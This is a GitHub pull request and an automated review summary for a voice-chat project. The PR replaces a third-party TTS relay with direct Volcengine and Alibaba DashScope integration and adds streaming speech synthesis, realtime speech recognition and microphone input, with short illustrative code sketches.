feat: migrate TTS providers to backend direct routing by Kiritogu · Pull Request #36 · datawhalechina/whale-whisper

Kiritogu · 2026-03-01T14:37:59Z

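Summary

Migrates the TTS and ASR modules from the third-party relay service (unspeech) to direct integration with the official Volcengine and Alibaba Cloud DashScope APIs, and adds incremental streaming TTS, realtime ASR over WebSocket, and microphone interaction.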

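Problem

TTS synthesis depends on the third-party relay service unspeech.hyp3r.link, which adds latency and a single point of failure
ASR supports only batch transcription and lacks realtime streaming speech recognition
The frontend has no microphone button, so users cannot speak directly in the chat interface
While the LLM streams its output, TTS has to wait for the complete reply, which makes responses feel slow
The speech provider list contains several placeholder entries that were never actually integrated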

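Related Issues / PRs:

Related to "What is still unimplemented in the current project?" #28 / "What is still unimplemented in the current project?" #26: that issue points out that ASR/TTS and other capabilities are incomplete, and this PR delivers the core implementation of the TTS and ASR modules
Supersedes Fix/tts voice flow #33: same branch (fix/tts-voice-flow), but this PR correctly targets the dev branch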

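Solution

Backend: implements native API calls for Volcengine and Alibaba Cloud (Volcengine over HTTPS with Base64 audio in JSON to openspeech.bytedance.com, Alibaba Cloud over a three-phase WebSocket protocol to dashscope.aliyuncs.com), removing the dependency on the unspeech relay. Adds Alibaba Cloud DashScope realtime ASR (qwen3-asr-flash-realtime) with WebSocket streaming recognition. The Provider Registry gains a local voice catalog (JSON files) and filters compatible voices by model.

Frontend: implements incremental streaming TTS (TtsStreamSegmenter splits text into sentences as LLM tokens arrive and synthesizes each sentence immediately) and adds several utility modules that break the logic into smaller pieces. The chat interface and the desktop app gain a microphone button with muted/unmuted states. The speech provider list is trimmed to the 4 providers that are actually integrated.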

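Changes

Core changes

Backend TTS direct routing (backend/app/api/tts.py, +675/-191)

Adds _forward_volcengine_tts: calls the Volcengine TTS API directly, with Bearer token authentication and Base64 audio decoding
Adds _forward_alibaba_tts: talks to Alibaba Cloud CosyVoice over WebSocket (three-phase protocol: run-task → continue-task → finish-task)
Removes the Dify/Coze TTS handlers (_stream_dify_tts, _stream_coze_tts) and the old streaming proxy logic
Adds structured error extraction and a hint for Volcengine credential errors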
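To make the three-phase exchange concrete, here is a minimal sketch of the three frames a client might send. The PR only names the actions (run-task, continue-task, finish-task); the header and payload field names, the voice ID, and the helper name `build_cosyvoice_frames` are assumptions for illustration and should be checked against the DashScope documentation and the actual `_forward_alibaba_tts` code.

```python
import json
import uuid


def build_cosyvoice_frames(text: str, model: str = "cosyvoice-v1",
                           voice: str = "longxiaochun") -> list:
    """Return the run-task, continue-task and finish-task frames as JSON strings.

    Field names below are assumed, not taken from the PR.
    """
    task_id = uuid.uuid4().hex  # one task id shared by all three frames

    def frame(action: str, payload: dict) -> str:
        header = {"action": action, "task_id": task_id, "streaming": "duplex"}
        return json.dumps({"header": header, "payload": payload}, ensure_ascii=False)

    # Phase 1: open the task and declare model and voice (assumed parameter names).
    run_task = frame("run-task", {
        "task_group": "audio",
        "task": "tts",
        "function": "SpeechSynthesizer",
        "model": model,
        "parameters": {"text_type": "PlainText", "voice": voice, "format": "mp3"},
        "input": {},
    })
    # Phase 2: send the text to synthesize (may be repeated for more text).
    continue_task = frame("continue-task", {"input": {"text": text}})
    # Phase 3: tell the server no more text is coming.
    finish_task = frame("finish-task", {"input": {}})
    return [run_task, continue_task, finish_task]
```

In a real client the frames would be sent one at a time over the WebSocket, with audio arriving as binary messages between the second and third phases.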

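Backend realtime ASR streaming (backend/app/api/asr.py, +613/-24)

Adds Alibaba Cloud DashScope batch transcription (/compatible-mode/v1/chat/completions + input_audio)
Adds AliyunRealtimeSession for realtime WebSocket ASR (wss://dashscope.aliyuncs.com/api-ws/v1/realtime)
Adds WebSocket disconnect detection and safe cleanup
Automatic model normalization: realtime streaming forces the -realtime suffix, batch mode strips it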
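The suffix rule in the last item can be sketched in a few lines. The function name `normalize_asr_model` is hypothetical and the PR's own helper may handle more cases; this only illustrates the stated behavior.

```python
REALTIME_SUFFIX = "-realtime"


def normalize_asr_model(model: str, realtime: bool) -> str:
    """Force the -realtime suffix for streaming, strip it for batch transcription."""
    name = model.strip()
    has_suffix = name.endswith(REALTIME_SUFFIX)
    if realtime:
        return name if has_suffix else name + REALTIME_SUFFIX
    return name[: -len(REALTIME_SUFFIX)] if has_suffix else name
```

With this rule a single configured model name can serve both the batch endpoint and the realtime WebSocket.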

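Provider Registry (backend/app/services/providers/registry.py, +225/-4)

list_voices loads the voice list from a local JSON catalog (LRU cached)
Alibaba Cloud voices are filtered by compatible_models to match the currently selected model
Adds Alibaba Cloud NLS ASR credential validation and model listing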
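A rough sketch of cached catalog loading plus model filtering follows. The catalog shape (a JSON array of objects with `id` and `compatible_models`) and both function names are assumptions; the real alibaba.json and registry.py may be structured differently.

```python
import json
from functools import lru_cache
from pathlib import Path
from typing import Optional


@lru_cache(maxsize=8)
def load_voice_catalog(path: str) -> tuple:
    """Read a catalog file once; later calls with the same path hit the cache."""
    entries = json.loads(Path(path).read_text(encoding="utf-8"))
    return tuple(entries)


def filter_voices(voices, model: Optional[str]) -> list:
    """Keep only voices whose compatible_models include the selected model."""
    if not model:
        return list(voices)
    return [v for v in voices if model in v.get("compatible_models", [])]
```

Returning a tuple keeps the cached value from being resized by callers, although the dictionaries inside it are still mutable.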

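Frontend incremental streaming TTS (speech-output.ts + new utility modules)

TtsStreamSegmenter: segments streamed LLM tokens on punctuation and special markers
runTtsChunkQueue: synthesizes segments in order and, on failure, falls back to merging the remaining text
tts-chunker.ts: supports CJK word segmentation (Intl.Segmenter), preserves decimals, and normalizes ellipses
tts-direct-request.ts: builds direct TTS requests and falls back to the legacy format on a 405 response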
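The segmentation idea can be illustrated with a small sketch. The actual TtsStreamSegmenter is TypeScript; this version is written in Python (the backend's language) purely for illustration, uses the hypothetical class name `StreamSegmenter`, and leaves out special markers, CJK word segmentation, and ellipsis normalization.

```python
import re

# Sentence-ending punctuation (CJK and Latin). A run of dots counts only when
# it is not followed by a digit, so decimals such as 3.5 stay in one piece.
_BOUNDARY = re.compile(r"[。！？!?；;\n]|\.+(?!\d)")


class StreamSegmenter:
    def __init__(self) -> None:
        self._buffer = ""

    def push(self, token: str) -> list:
        """Append a token and return every sentence completed so far."""
        self._buffer += token
        chunks, start = [], 0
        for match in _BOUNDARY.finditer(self._buffer):
            # Hold back trailing dots: the next token may begin with a digit.
            if match.group().startswith(".") and match.end() == len(self._buffer):
                break
            piece = self._buffer[start:match.end()].strip()
            if piece:
                chunks.append(piece)
            start = match.end()
        self._buffer = self._buffer[start:]
        return chunks

    def drain(self) -> str:
        """Return whatever is left when the stream ends and reset the buffer."""
        rest, self._buffer = self._buffer.strip(), ""
        return rest
```

Each chunk returned by `push` can be handed to synthesis right away, while `drain` covers a final sentence that never received closing punctuation.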

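Frontend ASR enhancements (transcription.ts + new utility modules)

Automatic restart of browser speech recognition (shouldAutoRestartBrowserRecognition)
Automatic fallback to MediaRecorder when AudioWorklet fails (decideCaptureFallback)
Transcript cleanup: filters out Windows paths that were misrecognized as speech (sanitizeTranscript)
Language code normalization: zh → zh-CN, defaulting to navigator.language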
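As an illustration of the transcript cleanup, the sketch below drops a transcript that consists solely of a Windows absolute path. The real sanitizeTranscript is TypeScript and its exact rule is not shown in the PR text, so the pattern and the name `sanitize_transcript` are assumptions.

```python
import re

# Drive letter, colon, a slash or backslash, then only characters that are
# legal in Windows paths. Applies to the whole string, not a substring.
_WINDOWS_PATH = re.compile(r'^[A-Za-z]:[\\/][^:*?"<>|\r\n]*$')


def sanitize_transcript(text: str) -> str:
    """Return the trimmed transcript, or an empty string if it is just a path."""
    cleaned = text.strip()
    if _WINDOWS_PATH.match(cleaned):
        return ""
    return cleaned
```

Anchoring the pattern at both ends means ordinary sentences that merely mention a drive letter pass through untouched.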

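Frontend UI

ChatArea.vue / DesktopChatOverlay.vue: adds a microphone button (with muted/unmuted visual states)
App.vue: wires onTokenLiteral / onTokenSpecial to drive incremental TTS
AudioSection.vue: language becomes a dropdown; redundant toggles are removed
Tauri windows enable useHttpsScheme to support microphone permission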

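Supporting changes

Adds voice catalog data files: alibaba.json (CosyVoice voices) and volcengine.json (Volcengine voices)
Trims provider-fallback.ts / provider-options.ts: removes 7 speech providers that were never integrated
provider-visibility.ts: the allowlist keeps only the 4 integrated providers
provider-fields.ts: automatically hides the baseUrl field when a default baseUrl exists
websockets is promoted from a dev dependency to a runtime dependency (pyproject.toml)
Config files engines.yaml / providers.yaml are updated to the official API endpoints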

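Notes

The .idea/ directory (JetBrains IDE configuration) is included in the commits; it should be added to .gitignore or removed from the commits
CLAUDE.md is committed as a project guide document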

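Breaking changes

Dify/Coze TTS handling removed: _stream_dify_tts, _stream_coze_tts and related functions are deleted
7 frontend speech provider options removed: OpenAI, ElevenLabs, Microsoft Speech, Index TTS, Comet API, Player2 and others no longer appear in settings
Default speech provider changed: from openai-audio-speech to browser-local-audio-speech
TTS API return type changed: run_tts_engine now returns Response (a complete audio buffer) instead of StreamingResponse
Alibaba Cloud model ID format changed: alibaba/cosyvoice-v1 → cosyvoice-v1 (prefix removed)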
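For callers that still hold the old prefixed ID, the last change amounts to a simple prefix strip. The helper below is a hypothetical sketch, not the PR's code.

```python
ALIBABA_PREFIX = "alibaba/"


def normalize_alibaba_model_id(model_id: str) -> str:
    """Map a legacy ID such as alibaba/cosyvoice-v1 to cosyvoice-v1."""
    value = model_id.strip()
    if value.startswith(ALIBABA_PREFIX):
        return value[len(ALIBABA_PREFIX):]
    return value
```

IDs that are already in the new format pass through unchanged, so the function is safe to apply to stored settings of either vintage.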

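Tests

Adds 16 test files covering the core logic:

Backend tests (6):

test_tts_engine_relay.py: Volcengine payload building, Alibaba Cloud model normalization, error extraction
test_asr_aliyun_dashscope.py: DashScope URL building, transcript text extraction, model normalization
test_provider_voices_tts.py: voice catalog loading and model filtering
test_provider_catalog_tts_defaults.py: default endpoint validation for TTS providers
test_provider_catalog_aliyun_fields.py: Alibaba Cloud NLS field normalization
test_asr_stream_disconnect.py: WebSocket disconnect detection

Frontend tests (10):

audio-direct.test.ts: direct request building and legacy format fallback
tts-chunker.test.ts: text chunking, CJK, special markers
tts-stream-segmenter.test.ts: stream segmentation and drain
tts-streaming-runner.test.ts: queue execution, error handling
browser-recognition-restart.test.ts: auto-restart logic
capture-startup.test.ts: worklet fallback logic
provider-fields.test.ts / provider-visibility.test.ts: field filtering and visibility
transcript-filter.test.ts / transcription-language.test.ts: transcript cleanup and language normalization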

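Self-testing

Backend unit tests pass (pytest backend/tests/test_tts_*.py backend/tests/test_asr_*.py backend/tests/test_provider_*.py)
Frontend unit tests pass
Started backend + frontend locally and verified that Volcengine TTS synthesis works
Verified locally that Alibaba Cloud CosyVoice TTS synthesis works
Verified locally that Alibaba Cloud DashScope realtime ASR streaming recognition works
The microphone button in the chat interface works (Web + Tauri)
Incremental TTS playback works while the LLM streams its reply
pnpm -C frontend --filter @whalewhisper/web build succeeds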

Checklist

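Code follows the project conventions
Self-review completed
Local tests pass
Documentation updated (if needed)
.idea/ directory removed from the commits or added to .gitignore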

Automatically generated by Claude AI

This reverts commit 3014403.

qodo-code-review · 2026-03-01T14:38:43Z

Review Summary by Qodo

Migrate TTS/ASR providers to backend direct routing with incremental streaming and voice catalogs

✨ Enhancement 🧪 Tests

Walkthroughs

Description

• Migrate TTS providers to backend direct routing with official provider endpoints for Volcengine
  and Alibaba, replacing unspeech relay
• Implement incremental TTS streaming for assistant responses with TtsStreamSegmenter and
  chunk-based playback
• Add microphone input to chat interface and desktop overlay with source-aware listening context
  tracking
• Implement Alibaba Bailian DashScope ASR integration with realtime WebSocket streaming support
• Add local static voice catalogs for Volcengine and Alibaba providers with backend voice listing
  API
• Normalize Alibaba model IDs by removing alibaba/ prefix in frontend and backend processing
• Prune frontend speech providers to Volcengine, Alibaba, and local audio only with visibility
  filtering
• Add comprehensive test coverage for TTS engine relay, ASR integration, provider voice catalogs,
  and field normalization
• Implement transcript sanitization, language normalization, and browser recognition auto-restart
  logic
• Add provider field filtering to hide redundant baseUrl configuration when defaults exist
• Update default speech provider from OpenAI to browser-local-audio-speech
• Add IDE configuration files and comprehensive development guide (CLAUDE.md)

Diagram

flowchart LR
  FE["Frontend<br/>Chat/Settings UI"]
  BE["Backend<br/>API Router"]
  VC["Volcengine<br/>Official API"]
  AC["Alibaba<br/>DashScope API"]
  
  FE -->|"/api/tts/engines"| BE
  FE -->|"/api/providers/voices"| BE
  FE -->|"/api/asr/stream"| BE
  
  BE -->|"Direct TTS"| VC
  BE -->|"Direct TTS/ASR"| AC
  
  FE -->|"Incremental text"| STREAM["TTS Stream<br/>Segmenter"]
  STREAM -->|"Chunks"| QUEUE["Chunk Queue<br/>Runner"]
  QUEUE -->|"Sequential requests"| BE

File Changes

1. frontend/packages/stage-settings-ui/src/components/AudioSection.vue ✨ Enhancement +96/-102

Refactor audio settings UI for source-aware listening

• Refactored microphone input handling to support multiple listening sources (settings-test and
 chat-input) with source tracking
• Replaced manual voice selection UI with language dropdown selector for transcription
• Removed voiceId and refreshVoices from speech output state management
• Updated listening state to use listeningSource for context-aware UI rendering
• Simplified transcription test UI with improved feedback display

frontend/packages/stage-settings-ui/src/components/AudioSection.vue

2. frontend/apps/web/src/components/widgets/ChatArea.vue ✨ Enhancement +109/-34

Add microphone input button to chat interface

• Added microphone button to chat input area with visual feedback for active listening
• Integrated useTranscriptionStore to manage chat-specific transcription state
• Implemented toggleChatMic function to start/stop listening with chat-input source
• Added error display for transcription errors in chat context

frontend/apps/web/src/components/widgets/ChatArea.vue

3. frontend/apps/desktop-tauri/renderer/src/components/DesktopChatOverlay.vue ✨ Enhancement +85/-18

Add microphone input to desktop chat overlay

• Added microphone button to desktop chat overlay with active state styling
• Integrated transcription store for managing listening state and errors
• Implemented toggleChatMic function for chat-input source listening
• Added visual feedback and error display for transcription in chat

frontend/apps/desktop-tauri/renderer/src/components/DesktopChatOverlay.vue

4. frontend/apps/desktop-tauri/renderer/src/SettingsApp.vue ✨ Enhancement +17/-0

Add microphone cleanup for settings window lifecycle
• Added cleanup for settings-test microphone sessions on window close
• Implemented visibility change listener to stop test microphone when window hidden
• Added stopSettingsTestMic function to manage listening source cleanup
frontend/apps/desktop-tauri/renderer/src/SettingsApp.vue

5. frontend/apps/web/src/components/settings/SettingsDialog.vue ✨ Enhancement +5/-0

Add microphone cleanup for settings dialog
• Added cleanup to stop settings-test listening when settings dialog closes
• Integrated useTranscriptionStore for managing test microphone state
frontend/apps/web/src/components/settings/SettingsDialog.vue

6. frontend/apps/desktop-tauri/renderer/src/ChatApp.vue ✨ Enhancement +8/-0

Integrate speech output for assistant messages
• Added useSpeechOutputStore integration for automatic speech synthesis
• Implemented listener for assistant final messages to trigger speech output
• Added chatStore.connect() call on mount
frontend/apps/desktop-tauri/renderer/src/ChatApp.vue

7. frontend/apps/web/src/App.vue ✨ Enhancement +7/-1

Add incremental speech synthesis for assistant responses

• Added token literal listener to push assistant text to speech output incrementally
• Updated special token handling to include speech output processing
• Changed final message handling to use endAssistantStream for streaming TTS

frontend/apps/web/src/App.vue

8. frontend/packages/app-settings/src/sections/ModelSection.vue ✨ Enhancement +9/-3

Reset voice selection on model change
• Added logic to reset voice field when speech model changes
• Implemented provider refresh after model selection change
frontend/packages/app-settings/src/sections/ModelSection.vue

9. frontend/packages/app-settings/src/sections/AudioSection.vue ✨ Enhancement +6/-1

Add microphone cleanup on unmount
• Added cleanup to stop settings-test listening on component unmount
frontend/packages/app-settings/src/sections/AudioSection.vue

10. frontend/packages/stage-settings-ui/src/components/ProviderPanel.vue ✨ Enhancement +7/-0

Add voice field empty state placeholder
• Added placeholder text for voice field when no compatible voices available
frontend/packages/stage-settings-ui/src/components/ProviderPanel.vue

11. frontend/packages/app-core/src/stores/speech-output.ts ✨ Enhancement +404/-87

Implement incremental TTS streaming for assistant

• Removed voiceId local storage and replaced with provider config voice
• Implemented incremental streaming support with TtsStreamSegmenter for assistant responses
• Added pushAssistantLiteral, pushAssistantSpecial, and endAssistantStream methods for
 streaming TTS
• Refactored TTS request handling to use requestTtsDirect with retry logic
• Added chunk-based playback with fallback to merged remainder on failure

frontend/packages/app-core/src/stores/speech-output.ts

12. frontend/packages/app-core/src/stores/transcription.ts ✨ Enhancement +210/-60

Add listening source tracking and language normalization

• Added listeningSource tracking to distinguish between settings-test and chat-input contexts
• Implemented browser recognition auto-restart logic with error recovery
• Added language normalization and initial language resolution based on navigator
• Refactored listening start/stop to accept options for source and auto-send configuration
• Added transcript sanitization to filter invalid paths and normalize text

frontend/packages/app-core/src/stores/transcription.ts

13. frontend/packages/app-core/src/data/provider-fallback.ts ⚙️ Configuration changes +12/-232

Prune unsupported speech providers and update endpoints

• Removed OpenAI and OpenAI-compatible speech providers from fallback catalog
• Removed ElevenLabs, Microsoft, Index TTS, Comet API, and Player2 speech providers
• Updated Volcengine default base URL from unspeech relay to official endpoint
• Updated Alibaba Cloud default base URL and model IDs (removed alibaba/ prefix)
• Updated Aliyun NLS transcription provider metadata and description

frontend/packages/app-core/src/data/provider-fallback.ts

14. frontend/packages/app-core/src/utils/tts-direct-request.ts ✨ Enhancement +262/-0

Add TTS direct request builder utility

• New utility for building backend relay TTS requests with engine-specific config normalization
• Implements legacy fallback request building for compatibility
• Handles Alibaba model ID normalization and Volcengine appId resolution
• Supports legacy unspeech endpoint migration to official provider endpoints

frontend/packages/app-core/src/utils/tts-direct-request.ts

15. frontend/packages/app-core/src/utils/tts-chunker.ts ✨ Enhancement +243/-0

Add TTS text chunking utility

• New utility for intelligent text chunking optimized for TTS streaming
• Implements punctuation-aware segmentation with word count balancing
• Supports special markers for flush and special token handling
• Provides sanitization to remove special markers from output chunks

frontend/packages/app-core/src/utils/tts-chunker.ts

16. frontend/packages/app-core/src/data/provider-options.ts ⚙️ Configuration changes +7/-104

Update provider options for backend relay

• Removed OpenAI and OpenAI-compatible speech provider options
• Removed ElevenLabs, Microsoft, Index TTS, Comet API, and Player2 speech providers
• Updated Volcengine and Alibaba Cloud provider configurations with new endpoints
• Updated Aliyun NLS transcription provider metadata

frontend/packages/app-core/src/data/provider-options.ts

17. frontend/packages/app-core/src/services/audio-direct.test.ts 🧪 Tests +172/-0

Add tests for TTS direct request builder
• New test suite for TTS direct request building and legacy fallback
• Tests engine support detection, request building, URL normalization
• Validates Alibaba model ID normalization and legacy request conversion
frontend/packages/app-core/src/services/audio-direct.test.ts

18. frontend/packages/app-core/src/services/audio.ts ✨ Enhancement +100/-13

Implement backend relay TTS with legacy fallback

• Refactored requestTts to use requestTtsDirect with backend relay support
• Added fallback to legacy /api/tts/synthesize endpoint on 405 response
• Implemented JSON response parsing for base64-encoded audio payloads
• Added error handling with status code and detail information

frontend/packages/app-core/src/services/audio.ts
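The JSON handling mentioned for audio.ts can be pictured as follows. The real code is TypeScript; this Python sketch only shows the idea, and the field names `audio` and `data` as well as the function name are assumptions.

```python
import base64
import json


def extract_audio_bytes(content_type: str, body: bytes) -> bytes:
    """Return raw audio, decoding a base64 JSON payload when one is sent."""
    if "application/json" not in content_type.lower():
        return body  # already binary audio
    payload = json.loads(body.decode("utf-8"))
    encoded = payload.get("audio") or payload.get("data")  # assumed field names
    if not isinstance(encoded, str):
        raise ValueError("JSON response carries no base64 audio field")
    return base64.b64decode(encoded)
```

Branching on the content type lets one code path accept both binary responses and JSON-wrapped audio.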

19. frontend/packages/app-core/src/utils/transcript-filter.ts ✨ Enhancement +17/-0

Add transcript sanitization utility
• New utility to sanitize transcripts by filtering invalid Windows absolute paths
• Prevents file paths from being treated as transcribed text
frontend/packages/app-core/src/utils/transcript-filter.ts

20. frontend/packages/app-core/src/stores/providers.ts ✨ Enhancement +63/-5

Provider normalization and visibility filtering for speech providers

• Added imports for filterProviderFields and isVisibleSpeechProviderId utilities
• Implemented normalizeProviderEntry() to normalize Aliyun NLS provider fields
• Implemented filterRemovedSpeechProviders() to filter speech providers by visibility
• Updated effectiveProviders computed to apply normalization and filtering to provider catalogs
• Modified getProviderFields() to use filterProviderFields() for field filtering
• Added queueProviderRefresh() helper function for provider refresh management
• Added watcher for settings store provider IDs to trigger provider refresh on changes
• Updated provider config watcher to use queueProviderRefresh()

frontend/packages/app-core/src/stores/providers.ts

21. frontend/packages/app-core/src/services/providers.ts ✨ Enhancement +33/-58

Migrate voice fetching to backend API endpoint

• Removed unspeech library imports and dependencies
• Replaced local Alibaba voice handling with backend API call to /api/providers/voices
• Simplified listProviderVoices() to use unified backend endpoint for voice fetching
• Added support for both direct backend calls and proxy-based requests
• Removed complex voice filtering and model candidate logic (moved to backend)

frontend/packages/app-core/src/services/providers.ts

22. frontend/packages/app-core/src/utils/tts-streaming-runner.ts ✨ Enhancement +72/-0

TTS chunk queue processing with error recovery

• New utility for processing TTS text chunks with error handling and recovery
• Implements runTtsChunkQueue() to process chunks sequentially with configurable error behavior
• Supports stopOnError option to halt on first failure or continue processing
• Provides TtsChunkQueueError for detailed error context with chunk index and total count
• Distinguishes between abort errors (which are rethrown) and recoverable errors

frontend/packages/app-core/src/utils/tts-streaming-runner.ts
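The behavior described for runTtsChunkQueue() can be sketched like this. The real function is TypeScript and asynchronous; the version below is a synchronous Python illustration, and `AbortError`, `ChunkQueueError`, and `run_chunk_queue` are stand-in names, not the PR's identifiers.

```python
from typing import Callable, Iterable


class AbortError(Exception):
    """Stand-in for a user-initiated cancellation."""


class ChunkQueueError(Exception):
    def __init__(self, index: int, total: int, cause: Exception) -> None:
        super().__init__(f"chunk {index + 1}/{total} failed: {cause}")
        self.index, self.total, self.cause = index, total, cause


def run_chunk_queue(chunks: Iterable[str], synthesize: Callable[[str], None],
                    stop_on_error: bool = False) -> int:
    """Synthesize chunks in order and return how many succeeded."""
    items = list(chunks)
    succeeded, last_error = 0, None
    for index, chunk in enumerate(items):
        try:
            synthesize(chunk)
            succeeded += 1
        except AbortError:
            raise  # cancellation is never swallowed
        except Exception as exc:
            last_error = ChunkQueueError(index, len(items), exc)
            if stop_on_error:
                raise last_error from exc
    # If every chunk failed, surface the last failure instead of returning 0.
    if items and succeeded == 0 and last_error is not None:
        raise last_error
    return succeeded
```

Carrying the chunk index and total in the error lets a caller decide what to do with the text that was not spoken, such as merging the remainder into one request.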

23. frontend/packages/app-core/src/utils/tts-streaming-runner.test.ts 🧪 Tests +79/-0

Tests for TTS chunk queue processing

• Test suite for runTtsChunkQueue() function
• Validates chunk processing continuation on individual failures
• Validates error throwing when all chunks fail
• Validates abort error propagation without suppression
• Validates stopOnError option behavior with error context

frontend/packages/app-core/src/utils/tts-streaming-runner.test.ts

24. frontend/packages/app-core/src/utils/provider-fields.ts ✨ Enhancement +23/-0

Provider field filtering based on defaults

• New utility to filter provider configuration fields based on defaults
• Hides baseUrl field when provider has default base URL in provider defaults or field default
• Reduces configuration complexity by hiding redundant fields

frontend/packages/app-core/src/utils/provider-fields.ts
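A minimal sketch of the hiding rule, assuming each field is a dictionary with an `id` and an optional `default`, and provider defaults are a dictionary keyed by field id. The real filterProviderFields() is TypeScript and its data shapes may differ.

```python
from typing import Optional


def filter_provider_fields(fields: list, provider_defaults: Optional[dict] = None) -> list:
    """Drop the baseUrl field when a default base URL is already known."""
    defaults = provider_defaults or {}

    def has_default(field: dict) -> bool:
        return bool(defaults.get("baseUrl") or field.get("default"))

    return [
        field for field in fields
        if not (field.get("id") == "baseUrl" and has_default(field))
    ]
```

Fields other than baseUrl are never filtered, so credentials such as apiKey always stay visible.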

25. frontend/packages/app-core/src/utils/provider-fields.test.ts 🧪 Tests +61/-0

Tests for provider field filtering

• Test suite for filterProviderFields() function
• Validates baseUrl field hiding when provider has default base URL
• Validates baseUrl field hiding when field itself has default value
• Validates baseUrl field retention when no defaults exist

frontend/packages/app-core/src/utils/provider-fields.test.ts

26. frontend/packages/app-core/src/utils/tts-chunker.test.ts 🧪 Tests +51/-0

Tests for TTS text chunking logic

• Test suite for TTS text chunking utilities
• Validates sentence splitting on hard punctuation
• Validates decimal number preservation in chunking
• Validates ellipsis normalization from three dots
• Validates special token and flush instruction handling

frontend/packages/app-core/src/utils/tts-chunker.test.ts

27. frontend/packages/app-core/src/utils/capture-startup.ts ✨ Enhancement +35/-0

Audio capture fallback decision logic

• New utility for audio capture fallback decision logic
• Implements decideCaptureFallback() to choose between media recorder and worklet modes
• Normalizes error messages from various error types
• Provides actionable error information when no fallback is available

frontend/packages/app-core/src/utils/capture-startup.ts
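The fallback decision might look roughly like the sketch below. It is written in Python for illustration only; the result shape, the mode string, and the error wording are assumptions rather than the contents of capture-startup.ts.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class CaptureDecision:
    mode: Optional[str]   # "media-recorder", or None when nothing is left to try
    error: Optional[str]  # human-readable reason when no fallback exists


def normalize_error(err: object) -> str:
    """Turn exceptions, strings, or empty values into a printable message."""
    if isinstance(err, BaseException):
        return str(err) or type(err).__name__
    return str(err) if err else "unknown error"


def decide_capture_fallback(worklet_error: object,
                            media_recorder_available: bool) -> CaptureDecision:
    """After a worklet failure, pick the media recorder if it is available."""
    if media_recorder_available:
        return CaptureDecision(mode="media-recorder", error=None)
    message = normalize_error(worklet_error)
    return CaptureDecision(mode=None, error=f"Audio capture failed: {message}")
```

Keeping the decision as a pure function makes it easy to unit test without a browser audio stack.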

28. frontend/packages/app-core/src/utils/capture-startup.test.ts 🧪 Tests +63/-0

Tests for audio capture fallback logic

• Test suite for audio capture fallback decision logic
• Validates fallback to media recorder when worklet fails
• Validates error return when no fallback available
• Validates error message normalization for non-Error types

frontend/packages/app-core/src/utils/capture-startup.test.ts

29. frontend/packages/app-core/src/utils/tts-stream-segmenter.ts ✨ Enhancement +64/-0

TTS stream segmentation for incremental processing

• New class TtsStreamSegmenter for streaming TTS text segmentation
• Manages incremental text input with special markers for flushing and control
• Emits completed chunks while preserving trailing text for next iteration
• Supports finalization mode for emitting remaining buffered text

frontend/packages/app-core/src/utils/tts-stream-segmenter.ts

30. frontend/packages/app-core/src/utils/tts-stream-segmenter.test.ts 🧪 Tests +39/-0

Tests for TTS stream segmentation
• Test suite for TtsStreamSegmenter class
• Validates sentence emission while keeping trailing text
• Validates special marker flushing behavior
• Validates final drain emission of incomplete sentences
frontend/packages/app-core/src/utils/tts-stream-segmenter.test.ts

31. frontend/packages/app-core/src/utils/provider-visibility.ts ✨ Enhancement +14/-0

Speech provider visibility filtering

• New utility defining visible speech provider IDs
• Implements isVisibleSpeechProviderId() to check provider visibility
• Implements filterVisibleSpeechProviders() to filter provider lists
• Restricts visible providers to Volcengine, Alibaba, and local audio providers

frontend/packages/app-core/src/utils/provider-visibility.ts

32. frontend/packages/app-core/src/utils/provider-visibility.test.ts 🧪 Tests +42/-0

Tests for speech provider visibility
• Test suite for speech provider visibility functions
• Validates visibility of configured speech providers
• Validates filtering of unsupported speech provider IDs
frontend/packages/app-core/src/utils/provider-visibility.test.ts

33. frontend/packages/app-core/src/utils/browser-recognition-restart.ts ✨ Enhancement +23/-0

Browser speech recognition restart decision logic
• New utility for browser speech recognition auto-restart logic
• Implements shouldAutoRestartBrowserRecognition() with multiple decision factors
• Prevents restart on manual stop, permission denial, and other fatal errors
frontend/packages/app-core/src/utils/browser-recognition-restart.ts
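A sketch of the restart decision, in Python for illustration. The error codes come from the Web Speech API, but which of them the PR treats as fatal is an assumption, as are the parameter and function names.

```python
from typing import Optional

# Assumed set of errors after which restarting would be pointless.
FATAL_ERRORS = frozenset({"not-allowed", "service-not-allowed", "audio-capture"})


def should_auto_restart(listening: bool, manually_stopped: bool,
                        last_error: Optional[str]) -> bool:
    """Restart only for an active session that ended without a fatal error."""
    if not listening or manually_stopped:
        return False
    return last_error not in FATAL_ERRORS
```

Browser recognition sessions tend to end on their own after a pause in speech, which is why a restart check of this kind is useful at all.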

34. frontend/packages/app-core/src/utils/browser-recognition-restart.test.ts 🧪 Tests +56/-0

Tests for browser recognition restart logic
• Test suite for browser recognition restart logic
• Validates restart on active user session without fatal errors
• Validates no restart after manual stop
• Validates no restart on microphone permission denial
frontend/packages/app-core/src/utils/browser-recognition-restart.test.ts

35. frontend/packages/app-core/src/utils/transcription-language.ts ✨ Enhancement +25/-0

Transcription language normalization utility

• New utility for transcription language normalization
• Implements normalizeTranscriptionLanguage() to standardize language codes
• Implements resolveInitialTranscriptionLanguage() with fallback to English
• Normalizes short codes (zh → zh-CN, en → en-US)

frontend/packages/app-core/src/utils/transcription-language.ts
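The normalization rule can be sketched as below. The two short-code mappings come from the summary above; using en-US as the English fallback and the Python function names are assumptions.

```python
from typing import Optional

SHORT_CODES = {"zh": "zh-CN", "en": "en-US"}


def normalize_transcription_language(code: Optional[str]) -> str:
    """Expand known short codes and keep specific locales as they are."""
    value = (code or "").strip()
    if not value:
        return ""
    return SHORT_CODES.get(value.lower(), value)


def resolve_initial_language(navigator_language: Optional[str]) -> str:
    """Follow the browser language, falling back to English when it is missing."""
    return normalize_transcription_language(navigator_language) or "en-US"
```

Locales that already carry a region, such as zh-TW, are deliberately left alone.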

36. frontend/packages/app-core/src/utils/transcription-language.test.ts 🧪 Tests +40/-0

Tests for transcription language normalization
• Test suite for transcription language normalization
• Validates short language code expansion
• Validates specific locale preservation
• Validates fallback to English when language missing
frontend/packages/app-core/src/utils/transcription-language.test.ts

37. frontend/packages/app-core/src/utils/transcript-filter.test.ts 🧪 Tests +23/-0

Tests for transcript filtering
• Test suite for transcript sanitization
• Validates filtering of Windows absolute file paths
• Validates preservation of natural language transcripts
frontend/packages/app-core/src/utils/transcript-filter.test.ts

38. frontend/packages/app-core/src/stores/settings.ts ⚙️ Configuration changes +1/-1

Update default speech provider to local audio
• Changed default speech provider from openai-audio-speech to browser-local-audio-speech
frontend/packages/app-core/src/stores/settings.ts

39. backend/app/api/tts.py ✨ Enhancement +675/-191

Direct TTS provider routing for Volcengine and Alibaba

• Refactored TTS engine routing to support direct provider endpoints for Volcengine and Alibaba
